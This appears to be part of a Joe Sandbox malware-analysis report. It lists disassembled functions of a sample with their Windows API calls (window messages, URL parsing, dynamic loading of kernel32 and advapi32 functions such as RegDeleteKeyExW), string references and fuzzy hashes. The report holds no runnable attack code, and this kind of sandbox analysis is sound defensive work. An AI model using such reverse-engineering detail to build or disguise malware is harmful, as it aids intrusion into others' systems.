Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf_memmove
String ID: REMOVE$THIS
API String ID: 2528338962-776492005
Opcode ID: d59935e8b3eeb5e499e758b86d88f0fc5d4aa54200c152ad819d9b0958fa5984
Instruction ID: 38bc61ed0e7331f52390dc646bfafe4b9a67ec8da5d30b2b74461752f4d01644
Opcode Fuzzy Hash: d59935e8b3eeb5e499e758b86d88f0fc5d4aa54200c152ad819d9b0958fa5984
Instruction Fuzzy Hash: 8C419574A00A199FCF00EF55C891BBEBBB5BF48309F04806AE856AB352DB389D45CB54

Function 0047A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004ADBF0,00000000,?,?,?,?), ref: 0047A4E6
GetWindowLongW.USER32 ref: 0047A503
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0047A513

Strings

SysTreeView32, xrefs: 0047A4B8

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 30a80961b0266f7da4065e5b924f0b30b1de8371ce78d47893a304d64c028274
Instruction ID: 765834f616884fbfa71d7be1746de08304441d1eb438c858ce4765c1aa0457f6
Opcode Fuzzy Hash: 30a80961b0266f7da4065e5b924f0b30b1de8371ce78d47893a304d64c028274
Instruction Fuzzy Hash: 1031C431200205AFDB119E34CC45BEB7769EB89328F208726F879932E0D779E8609B58

Function 004657D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004657E7
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0046581D

Strings

|, xrefs: 0046580C
?KF, xrefs: 00465885

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CrackInternet_memset
String ID: ?KF$|
API String ID: 1413715105-1963600565
Opcode ID: 3f6de0be769e09eb45072193707a043dd1c4554a08207fe34658721682c46def
Instruction ID: 2cec11f4215de736d7e5d456ab08dc945976cc1f51af2e167f94e5e7aa921b1d
Opcode Fuzzy Hash: 3f6de0be769e09eb45072193707a043dd1c4554a08207fe34658721682c46def
Instruction Fuzzy Hash: BF314C71900109EBCF11AFA1CC85EEF7FB8FF18304F10402AF815A6161EB359956CBA5

Function 00479EE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00479F6B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00479F7F
SendMessageW.USER32(?,00001002,00000000,?), ref: 00479FA3

Strings

SysMonthCal32, xrefs: 00479F36

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 74030a1c2c9a49b5eabc64a2238e5673379ef0d1bafb0f4e41d3c6308bd6308f
Instruction ID: 65f358c7574efc5cbf7ca07f9c431e75793c846c1873b1c0daa015333e5f033e
Opcode Fuzzy Hash: 74030a1c2c9a49b5eabc64a2238e5673379ef0d1bafb0f4e41d3c6308bd6308f
Instruction Fuzzy Hash: 9E219F32600218BBDF118F54CC82FEA3B69EF48724F114215FA59AB1D0D6B9EC509B94

Function 0047A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0047A74F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0047A75D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0047A764

Strings

msctls_updown32, xrefs: 0047A6C9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5d6388aa9494e38baf119c90ca41611e758d09b1738f5e90468636346c1182f9
Instruction ID: f6114b864d14991e5fbce29894ad9ce524f16ee82295be6c8da6cd5b861af47d
Opcode Fuzzy Hash: 5d6388aa9494e38baf119c90ca41611e758d09b1738f5e90468636346c1182f9
Instruction Fuzzy Hash: E221A1B5600204AFDB14EF64DCC1EAB37ACEB49398B04405BFA0497361C774EC21CA65

Function 004797B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0047983D
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0047984D
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00479872

Strings

Listbox, xrefs: 0047980A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 81e3222317f115a9b9bb47b33dc8c408e23aa91e552079207c277387f0e83b0b
Instruction ID: b82081af4a2f8593d27c7b7f4fa3e316d9cfed5a7089f72b3f4c6d9ca63a9a94
Opcode Fuzzy Hash: 81e3222317f115a9b9bb47b33dc8c408e23aa91e552079207c277387f0e83b0b
Instruction Fuzzy Hash: A4210432610118BFEF159F54CC85FEB3BAEEF8A754F01C126F9089B290C6759C128BA4

Function 0047A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0047A27B
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0047A290
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0047A29D

Strings

msctls_trackbar32, xrefs: 0047A252

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c069ff70075f65766ef7e88b9ffebe6550c1b5311c5e4ff3458ac13c9df632b0
Instruction ID: cb5a15c365c148c9d2c89b2cc4d337c779ea78821e45431a482d542bec668d8f
Opcode Fuzzy Hash: c069ff70075f65766ef7e88b9ffebe6550c1b5311c5e4ff3458ac13c9df632b0
Instruction Fuzzy Hash: B811E771200248BADB205F65CC46FDB3BA8EFC8B54F11812AFA45A6291D276A861DB64

Function 00432F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00432F11,00000000), ref: 00432F79
GetProcAddress.KERNEL32(00000000), ref: 00432F80

Strings

RoInitialize, xrefs: 00432F68
combase.dll, xrefs: 00432F74

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: d6fb664c0507a247b0a6663e0d25a1c54bd27d0a907c7c3a1515d6cec44fef6c
Instruction ID: cfb7709c251b4a93f76166ae8b59c8c76cd5c90e7f9721f818b1c6bdd8132722
Opcode Fuzzy Hash: d6fb664c0507a247b0a6663e0d25a1c54bd27d0a907c7c3a1515d6cec44fef6c
Instruction Fuzzy Hash: E6E01A70A95304ABDF506F71EE4DB193A64A714B4AF100036B142D21A0CBBA4050DF0C

Function 00433034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00432F4E), ref: 0043304E
GetProcAddress.KERNEL32(00000000), ref: 00433055

Strings

RoUninitialize, xrefs: 0043303D
combase.dll, xrefs: 00433049

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 4c6590160b2b3a904e9a93f71ba648607654f2e32c05def8c0bdf2695f855464
Instruction ID: c27d61190378704f1a59795a00aecf66a48065c7f3e6e413293da1a6e96ecb3b
Opcode Fuzzy Hash: 4c6590160b2b3a904e9a93f71ba648607654f2e32c05def8c0bdf2695f855464
Instruction Fuzzy Hash: 44E0B670A86305ABDB645F61EE0DB093B64B714746F100077F109D21B4CBBA85108B1C

Function 004720F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,004720EC,?,0046F751), ref: 00472104
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00472116

Strings

kernel32.dll, xrefs: 004720FF
GetProcessId, xrefs: 00472110

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 9c4fd1e7649566152c631634b2d48a7e6e26dbd82be33201e0da0330f8afb8a7
Instruction ID: 3f678fab1a80e06d198bbbf3958ec127ccedee244a0de2336d6a40d9637e2189
Opcode Fuzzy Hash: 9c4fd1e7649566152c631634b2d48a7e6e26dbd82be33201e0da0330f8afb8a7
Instruction Fuzzy Hash: 34D05E398003129BD7606B60AA0AB8236D4AB14300B10843FE749A225DD6F8C4808A18

Function 0045137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0045135F,?,00451440), ref: 00451389
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0045139B

Strings

RegisterTypeLibForUser, xrefs: 00451395
oleaut32.dll, xrefs: 00451384

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 4d8e9fa29912b5c9d4a558669ffaa1d401a8c47ac8891cf361dbb2de2df21556
Instruction ID: 500cc25aaadf8f9874228488bc71944c75b837052426d64e49a03f02094e3aa7
Opcode Fuzzy Hash: 4d8e9fa29912b5c9d4a558669ffaa1d401a8c47ac8891cf361dbb2de2df21556
Instruction Fuzzy Hash: 1BD0A73AC003129FE7204F25F809B8236D4AF14306F14843FEC85D2668D678CC84971C

Function 004513A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00451371,?,00451519), ref: 004513B4
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004513C6

Strings

oleaut32.dll, xrefs: 004513AF
UnRegisterTypeLibForUser, xrefs: 004513C0

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 560a3384bf0e7574a225b22e0cb031243f2223912fda829399a78fc976de86f1
Instruction ID: e2397313bd3a9d947bab692f7b3f8af32c26e38a3ed06f97d3e9738b16009eb9
Opcode Fuzzy Hash: 560a3384bf0e7574a225b22e0cb031243f2223912fda829399a78fc976de86f1
Instruction Fuzzy Hash: 53D0523A8003129AE7204F25A809B0236E8AF5030AB20843FA89592678DABCC8848A1C

Function 0042E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0042E6D9,0000000C,0042E55B,004ADC28,?,?), ref: 0042E6F1
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0042E703

Strings

IsWow64Process, xrefs: 0042E6FD
kernel32.dll, xrefs: 0042E6EC

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsWow64Process$kernel32.dll
API String ID: 2574300362-3024904723
Opcode ID: 9f0036068a5455150ddfe6432a4e6ad980d66edb2d2930114a39c7f7e84a8c64
Instruction ID: cc74dcd9c4ff4f8f73f55c565e80cf8912967f46c2c022f4d475873825c82ebf
Opcode Fuzzy Hash: 9f0036068a5455150ddfe6432a4e6ad980d66edb2d2930114a39c7f7e84a8c64
Instruction Fuzzy Hash: 83D05E399003228BD7202B65F949B833BD4AB14300B10443FE495A2254D6F8C4808618

Function 0042E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0042E69C,?,0042E43F), ref: 0042E6B4
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0042E6C6

Strings

GetNativeSystemInfo, xrefs: 0042E6C0
kernel32.dll, xrefs: 0042E6AF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a80102ecea0b1b5a6139bdb483dd785457bc55775d4160e77e8e4d4d357a425e
Instruction ID: 3a88c5ea055df3ad8870284511f581b56f7ac51b5c2f1b6badd0233fc7ba16b7
Opcode Fuzzy Hash: a80102ecea0b1b5a6139bdb483dd785457bc55775d4160e77e8e4d4d357a425e
Instruction Fuzzy Hash: 8CD05E399003228ED7205B23B909B4236D4AF34701B50643FE445A2268D6F8C480861C

Function 00473ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00473AC2,?,004729F5), ref: 00473ADA
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00473AEC

Strings

RegDeleteKeyExW, xrefs: 00473AE6
advapi32.dll, xrefs: 00473AD5

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 3946375c2d1a8eece0ea07e9646505fd7212113ff3f0f4d0e199c1049658fd28
Instruction ID: e29fa4d307f9014819aa2ec52a0e72c640510b0714bb10c3118763c822bca5f9
Opcode Fuzzy Hash: 3946375c2d1a8eece0ea07e9646505fd7212113ff3f0f4d0e199c1049658fd28
Instruction Fuzzy Hash: 8CD05E759003138EDB204F60A90AB8236D4AB21305B10843FE49992258EAB8C580861C

Function 0046EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0046EBAF,?,0046EAAC), ref: 0046EBC7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0046EBD9

Strings

GetSystemWow64DirectoryW, xrefs: 0046EBD3
kernel32.dll, xrefs: 0046EBC2

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: d684d0f375fef31f1611af0dc9c6665994c8c73e7c4645acd3a37dd8e2c4d22c
Instruction ID: 7a2e737ec8aca7d56f4b72fa56bc5c6dbc57282db2619729a4dea94aa23fb248
Opcode Fuzzy Hash: d684d0f375fef31f1611af0dc9c6665994c8c73e7c4645acd3a37dd8e2c4d22c
Instruction Fuzzy Hash: BBD05E398043138BD7205F31A949B4236D4AB14704B20843FE45692254EAB8E880861C

Function 00413EC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00413EBB,?,00413E91,?), ref: 00413ED3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00413EE5

Strings

kernel32.dll, xrefs: 00413ECE
Wow64RevertWow64FsRedirection, xrefs: 00413EDF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
